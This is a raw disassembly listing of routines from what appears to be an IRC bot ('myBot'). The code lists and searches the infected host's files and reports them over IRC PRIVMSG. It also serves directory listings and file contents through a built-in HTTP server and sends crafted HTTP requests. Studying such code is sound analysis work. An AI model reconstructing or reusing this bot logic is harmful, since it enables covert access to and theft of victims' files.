var_494 = byte ptr -494h
var_38C = dword ptr -38Ch
var_378 = byte ptr -378h
var_36C = dword ptr -36Ch
Str1 = byte ptr -360h
Str = byte ptr -24Ch
Dest = byte ptr -4Ch
var_24 = byte ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 598h
push ebx
push esi
push edi
xor ebx, ebx
push 104h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call _memset
mov edi, [ebp+arg_0]
push offset asc_42CDD8 ; "\n"
push edi ; Str
call _strtok
add esp, 14h
cmp [ebp+arg_8], ebx
push edi
jz short loc_412194
push [ebp+arg_8]
mov esi, 200h
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp loc_412290
; ---------------------------------------------------------------------------
loc_412194: ; CODE XREF: sub_412135+3B�j
cmp [ebp+Source], ebx
jz loc_412276
call _strlen
push edi
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
mov [eax+edi-1], bl
mov esi, 200h
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
push edi ; Str
call _strlen
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
mov byte ptr [eax+edi], 2Ah
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_412290
; ---------------------------------------------------------------------------
loc_412276: ; CODE XREF: sub_412135+62�j
push offset aSearchingForS ; "Searching for: %s\r\n"
mov esi, 200h
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_412290: ; CODE XREF: sub_412135+5A�j
; sub_412135+13F�j
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
cmp [ebp+Source], ebx
jz short loc_412328
push [ebp+Source] ; Str
call _strlen
cmp eax, 2
pop ecx
jbe short loc_412328
push [ebp+Source] ; Str
call _strlen
sub eax, 3
pop ecx
jz short loc_4122DC
loc_4122D0: ; CODE XREF: sub_412135+1A5�j
mov ecx, [ebp+Source]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_4122DC
dec eax
jnz short loc_4122D0
loc_4122DC: ; CODE XREF: sub_412135+199�j
; sub_412135+1A2�j
inc eax
push eax ; Count
push [ebp+Source] ; Source
lea eax, [ebp+Dst]
push eax ; Dest
call _strncpy
lea eax, [ebp+Dst]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
loc_412328: ; CODE XREF: sub_412135+17D�j
; sub_412135+18B�j
lea eax, [ebp+var_38C]
push eax
push edi
call ds:dword_42B0B4 ; FindFirstFileA
lea ecx, [ebp+var_38C]
push ecx
push eax
mov [ebp+var_C], eax
call ds:dword_42B0B0 ; FindNextFileA
test eax, eax
jz loc_41271F
mov edi, 1FFh
loc_412354: ; CODE XREF: sub_412135+5E4�j
cmp [ebp+var_38C], ebx
jz loc_412707
lea eax, [ebp+Str1]
push offset a__ ; ".."
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_412707
lea eax, [ebp+Str1]
push offset a__0 ; "."
push eax ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_412707
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_378]
push eax
call ds:dword_42B0AC ; FileTimeToLocalFileTime
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
call ds:dword_42B0A8 ; FileTimeToSystemTime
mov ax, [ebp+var_14]
cmp ax, 0Ch
mov ecx, offset aPm_0 ; "PM"
ja loc_412451
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_4123D0: ; CODE XREF: sub_412135+322�j
push ecx
movzx ecx, [ebp+var_12]
push ecx
push eax
movzx eax, [ebp+var_1C]
push eax
movzx eax, [ebp+var_16]
push eax
movzx eax, [ebp+var_1A]
push eax
lea eax, [ebp+Dest]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax ; Dest
call _sprintf
add esp, 20h
test byte ptr [ebp+var_38C], 10h
jz loc_412588
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_41245C
lea eax, [ebp+Str1]
push eax
push offset aS_3 ; "<%s>"
lea eax, [ebp+var_494]
push 106h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_494]
push eax
push [ebp+arg_8]
lea eax, [ebp+Str]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 28h
jmp loc_4126D8
; ---------------------------------------------------------------------------
loc_412451: ; CODE XREF: sub_412135+28D�j
movzx eax, ax
sub eax, 0Ch
jmp loc_4123D0
; ---------------------------------------------------------------------------
loc_41245C: ; CODE XREF: sub_412135+2D5�j
cmp [ebp+Source], ebx
jz loc_412546
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+Str]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
lea eax, [ebp+Str1]
push eax
push [ebp+Source]
lea eax, [ebp+Str]
push offset aSS_4 ; "%s%s/"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Eh
lea eax, [ebp+Str1]
pop ecx
push eax
lea eax, [ebp+Str]
jbe short loc_412502
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_412507
; ---------------------------------------------------------------------------
loc_412502: ; CODE XREF: sub_412135+3C4�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_412507: ; CODE XREF: sub_412135+3CB�j
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
push 3Ch
lea eax, [ebp+Dest]
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4126C9
; ---------------------------------------------------------------------------
loc_412546: ; CODE XREF: sub_412135+32A�j
lea eax, [ebp+Str1]
push eax
push offset aS_3 ; "<%s>"
lea eax, [ebp+var_494]
push 106h ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_494]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_412573: ; CODE XREF: sub_412135+47B�j
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 24h
jmp loc_4126D8
; ---------------------------------------------------------------------------
loc_412588: ; CODE XREF: sub_412135+2C9�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_4125B2
push ebx
push [ebp+var_36C]
call sub_419443
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_412573
; ---------------------------------------------------------------------------
loc_4125B2: ; CODE XREF: sub_412135+459�j
cmp [ebp+Source], ebx
jz loc_4126B2
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+Str]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
lea eax, [ebp+Str1]
push eax
push [ebp+Source]
lea eax, [ebp+Str]
push offset aSS ; "%s%s"
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 1Fh
lea eax, [ebp+Str1]
pop ecx
push eax
lea eax, [ebp+Str]
jbe short loc_412658
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_41265D
; ---------------------------------------------------------------------------
loc_412658: ; CODE XREF: sub_412135+51A�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_41265D: ; CODE XREF: sub_412135+521�j
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
mov eax, [ebp+var_36C]
shr eax, 0Ah
push eax
push 3Ch
lea eax, [ebp+Dest]
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+Str]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
jmp short loc_4126D8
; ---------------------------------------------------------------------------
loc_4126B2: ; CODE XREF: sub_412135+480�j
push [ebp+var_36C]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str1]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi ; Count
loc_4126C9: ; CODE XREF: sub_412135+40C�j
lea eax, [ebp+Str]
push eax ; Dest
call __snprintf
add esp, 18h
loc_4126D8: ; CODE XREF: sub_412135+317�j
; sub_412135+44E�j ...
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
cmp [ebp+arg_8], ebx
jz short loc_412707
push 7D0h
call ds:dword_42B014 ; Sleep
loc_412707: ; CODE XREF: sub_412135+225�j
; sub_412135+240�j ...
lea eax, [ebp+var_38C]
push eax
push [ebp+var_C]
call ds:dword_42B0B0 ; FindNextFileA
test eax, eax
jnz loc_412354
loc_41271F: ; CODE XREF: sub_412135+214�j
push [ebp+var_C]
call ds:dword_42B0A4 ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_412762
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_419443
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_419443
pop ecx
pop ecx
push eax
push [ebp+arg_8]
lea eax, [ebp+Str]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax ; Dest
call _sprintf
add esp, 14h
jmp short loc_412790
; ---------------------------------------------------------------------------
loc_412762: ; CODE XREF: sub_412135+5F6�j
cmp [ebp+Source], ebx
lea eax, [ebp+Str]
jz short loc_41277C
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_412790
; ---------------------------------------------------------------------------
loc_41277C: ; CODE XREF: sub_412135+636�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax ; Dest
call _sprintf
add esp, 10h
loc_412790: ; CODE XREF: sub_412135+62B�j
; sub_412135+645�j
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_4]
call dword_4441A0 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_412135 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4127B6 proc near ; CODE XREF: sub_4129C2+125�p
Dst = byte ptr -408h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 408h
push ebx
push esi
push edi
xor esi, esi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_8], esi
call ds:dword_42B08C ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_41286E
push esi
push ebx
call ds:dword_42B0BC ; GetFileSize
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_412867
loc_4127FB: ; CODE XREF: sub_4127B6+AF�j
push 400h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp edi, [ebp+var_4]
jbe short loc_412818
mov edi, [ebp+var_4]
loc_412818: ; CODE XREF: sub_4127B6+5D�j
mov eax, [ebp+var_4]
push 2
push esi
neg eax
push eax
push ebx
call ds:dword_42B0B8 ; SetFilePointer
push esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+Dst]
push eax
push ebx
call ds:dword_42B080 ; ReadFile
push esi
push edi
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_412862
call dword_4441C4 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_412867
xor eax, eax
loc_412862: ; CODE XREF: sub_4127B6+9B�j
sub [ebp+var_4], eax
jnz short loc_4127FB
loc_412867: ; CODE XREF: sub_4127B6+43�j
; sub_4127B6+A8�j
push ebx
call ds:dword_42B004 ; CloseHandle
loc_41286E: ; CODE XREF: sub_4127B6+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_4127B6 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_412873(char *Str)
sub_412873 proc near ; CODE XREF: sub_412B2A+17B�p
Str = dword ptr 4
push esi
push edi
mov edi, [esp+8+Str]
push edi ; Str
xor esi, esi
call _strlen
test eax, eax
pop ecx
jbe short loc_41289C
loc_412886: ; CODE XREF: sub_412873+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_412890
mov byte ptr [esi+edi], 2Fh
loc_412890: ; CODE XREF: sub_412873+17�j
push edi ; Str
inc esi
call _strlen
cmp esi, eax
pop ecx
jb short loc_412886
loc_41289C: ; CODE XREF: sub_412873+11�j
mov eax, edi
pop edi
pop esi
retn
sub_412873 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4128A1(int,char *Str,int,int,int,int,int,int,int)
sub_4128A1 proc near ; CODE XREF: sub_40274D+4FE6�p
var_4A0 = byte ptr -4A0h
Dest = byte ptr -310h
Format = byte ptr -110h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
push edi
lea eax, [ebp+var_4A0]
push eax
push 101h
call dword_444110 ; WSAStartup
push 6
push 1
push 2
call dword_444100 ; socket
push 10h ; Size
mov ebx, eax
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+arg_14]
mov [ebp+Dst], 2
call dword_444260 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_4022BD
pop ecx
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+Dst]
push eax
push ebx
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_41297E
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_41291A
mov eax, offset byte_42B633
loc_41291A: ; CODE XREF: sub_4128A1+72�j
push esi
push [ebp+arg_10]
mov esi, 100h
push eax
push [ebp+arg_1C]
lea eax, [ebp+Format]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Format]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Format]
push eax
push ebx
call dword_4441A0 ; send
push esi ; Size
lea eax, [ebp+Format]
push edi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
push edi
push esi
lea eax, [ebp+Format]
push eax
push ebx
call dword_444064 ; recv
pop esi
loc_41297E: ; CODE XREF: sub_4128A1+6B�j
push ebx
call dword_444218 ; closesocket
call dword_444224 ; WSACleanup
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_4129BE
push edi ; int
push [ebp+arg_8] ; int
lea eax, [ebp+Dest]
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_40123B
add esp, 14h
loc_4129BE: ; CODE XREF: sub_4128A1+102�j
pop edi
pop ebx
leave
retn
sub_4128A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_4129C2 proc near ; DATA XREF: sub_412B2A+245�o
Str = byte ptr -1654h
Source = byte ptr -654h
Dest = byte ptr -550h
var_44C = dword ptr -44Ch
Format = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call __alloca_probe
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+Format]
push eax ; Format
lea eax, [ebp+74h+Dest]
push eax ; Dest
call _sprintf
lea eax, [ebp+74h+var_2C4]
push eax ; Format
lea eax, [ebp+74h+Source]
push eax ; Dest
call _sprintf
xor edi, edi
add esp, 10h
cmp [ebp+74h+var_A4], edi
lea eax, [ebp+74h+var_9C]
jz short loc_412A29
push offset aTextHtml ; "text/html"
jmp short loc_412A2E
; ---------------------------------------------------------------------------
loc_412A29: ; CODE XREF: sub_4129C2+5E�j
push offset aApplicationOct ; "application/octet-stream"
loc_412A2E: ; CODE XREF: sub_4129C2+65�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
mov esi, 409h
push esi
call ds:dword_42B0C4 ; GetDateFormatA
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_42B0C0 ; GetTimeFormatA
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_412A9B
push eax
lea eax, [ebp+74h+Str]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 24h
jmp short loc_412AB3
; ---------------------------------------------------------------------------
loc_412A9B: ; CODE XREF: sub_4129C2+C0�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+Str]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 28h
loc_412AB3: ; CODE XREF: sub_4129C2+D7�j
lea eax, [ebp+74h+Str]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+74h+Str]
push eax
push [ebp+74h+var_44C]
call dword_4441A0 ; send
cmp [ebp+74h+var_A4], edi
jnz short loc_412AF0
lea eax, [ebp+74h+Dest]
push eax
push [ebp+74h+var_44C]
call sub_4127B6
pop ecx
pop ecx
jmp short loc_412B0D
; ---------------------------------------------------------------------------
loc_412AF0: ; CODE XREF: sub_4129C2+116�j
lea eax, [ebp+74h+Source]
push eax ; Source
push edi ; int
push [ebp+74h+var_44C] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
call sub_412135
add esp, 10h
loc_412B0D: ; CODE XREF: sub_4129C2+12C�j
push [ebp+74h+var_44C]
call dword_444218 ; closesocket
push [ebp+74h+var_B4]
call sub_40B149
pop ecx
push edi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_4129C2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412B2A proc near ; CODE XREF: sub_412DD9+39B�p
Source = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
Str = byte ptr -314h
var_211 = byte ptr -211h
Dst = byte ptr -210h
Dest = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
mov [ebp+var_4], edi
call _memset
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
push eax
jz short loc_412B60
push offset aS_9 ; "\\%s"
jmp short loc_412B68
; ---------------------------------------------------------------------------
loc_412B60: ; CODE XREF: sub_412B2A+2D�j
mov byte ptr [eax], 5Ch
push offset aS ; "%s"
loc_412B68: ; CODE XREF: sub_412B2A+34�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
add esp, 0Ch
push eax ; Str
xor esi, esi
xor ebx, ebx
call _strlen
test eax, eax
pop ecx
jbe short loc_412C03
mov [ebp+arg_8], 2
loc_412B93: ; CODE XREF: sub_412B2A+D7�j
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_412BD3
cmp [ebp+esi+Dest], 25h
jnz short loc_412BD3
cmp [ebp+esi+var_10B], 32h
jnz short loc_412BD3
cmp [ebp+esi+var_10A], 30h
jnz short loc_412BD3
inc esi
inc esi
add [ebp+arg_8], 2
mov [ebp+ebx+Dst], 20h
jmp short loc_412BED
; ---------------------------------------------------------------------------
loc_412BD3: ; CODE XREF: sub_412B2A+79�j
; sub_412B2A+83�j ...
mov al, [ebp+esi+Dest]
cmp al, 2Fh
jnz short loc_412BE3
push 5Ch
pop eax
jmp short loc_412BE6
; ---------------------------------------------------------------------------
loc_412BE3: ; CODE XREF: sub_412B2A+B2�j
movsx eax, al
loc_412BE6: ; CODE XREF: sub_412B2A+B7�j
mov [ebp+ebx+Dst], al
loc_412BED: ; CODE XREF: sub_412B2A+A7�j
lea eax, [ebp+Dest]
inc esi
inc [ebp+arg_8]
push eax ; Str
inc ebx
call _strlen
cmp esi, eax
pop ecx
jb short loc_412B93
loc_412C03: ; CODE XREF: sub_412B2A+60�j
lea eax, [ebp+Dst]
push eax
push [ebp+arg_4]
lea eax, [ebp+Str]
push offset aSS ; "%s%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
push offset asc_42CDD8 ; "\n"
push eax ; Str
call _strtok
add esp, 18h
lea eax, [ebp+Str]
push eax
call ds:dword_42B050 ; GetFileAttributesA
xor esi, esi
inc esi
cmp eax, 10h
jz short loc_412C51
cmp eax, 0FFFFFFFFh
jnz short loc_412C54
push [ebp+arg_0]
jmp short loc_412CD0
; ---------------------------------------------------------------------------
loc_412C51: ; CODE XREF: sub_412B2A+11B�j
mov [ebp+var_4], esi
loc_412C54: ; CODE XREF: sub_412B2A+120�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_412C61
mov [ebp+var_4], esi
loc_412C61: ; CODE XREF: sub_412B2A+132�j
cmp [ebp+var_4], edi
mov ebx, [ebp+arg_0]
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_412CDB
cmp [ebp+arg_C], edi
jz short loc_412CCF
lea eax, [ebp+Str]
push offset asc_434A30 ; "*"
push eax ; Dest
call _strcat
lea eax, [ebp+Str]
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax ; Str
call sub_412873
lea eax, [ebp+Dst]
push eax ; Format
lea eax, [ebp+var_53C]
push eax ; Dest
call _sprintf
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_412D2A
; ---------------------------------------------------------------------------
loc_412CCF: ; CODE XREF: sub_412B2A+14E�j
push ebx
loc_412CD0: ; CODE XREF: sub_412B2A+125�j
call dword_444218 ; closesocket
jmp loc_412DC0
; ---------------------------------------------------------------------------
loc_412CDB: ; CODE XREF: sub_412B2A+149�j
push edi
push edi
push 3
push edi
push esi
push 80000000h
lea eax, [ebp+Str]
push eax
call ds:dword_42B08C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_412D2A
lea eax, [ebp+Str]
push eax ; Format
lea eax, [ebp+var_640]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push edi
push esi
mov [ebp+var_31C], edi
call ds:dword_42B0BC ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_42B004 ; CloseHandle
loc_412D2A: ; CODE XREF: sub_412B2A+1A3�j
; sub_412B2A+1CE�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+Source]
push offset asc_4349FC ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Source]
push 3 ; int
push eax ; Source
call sub_40AE85
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_4444EC[eax], esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_6C4]
push eax
push offset sub_4129C2
push edi
push edi
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_4444FC[ecx], eax
jnz short loc_412DCF
push ebx
call dword_444218 ; closesocket
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_4349C4 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_417D70
add esp, 10h
loc_412DC0: ; CODE XREF: sub_412B2A+1AC�j
; sub_412B2A+2AD�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_412DC7: ; CODE XREF: sub_412B2A+2AB�j
push 5
call ds:dword_42B014 ; Sleep
loc_412DCF: ; CODE XREF: sub_412B2A+266�j
cmp [ebp+var_318], edi
jz short loc_412DC7
jmp short loc_412DC0
sub_412B2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_412DD9 proc near ; DATA XREF: sub_40274D+2073�o
; sub_40B690+46C�o
Str = byte ptr -28F0h
Str1 = byte ptr -18F0h
Dest = byte ptr -8F0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
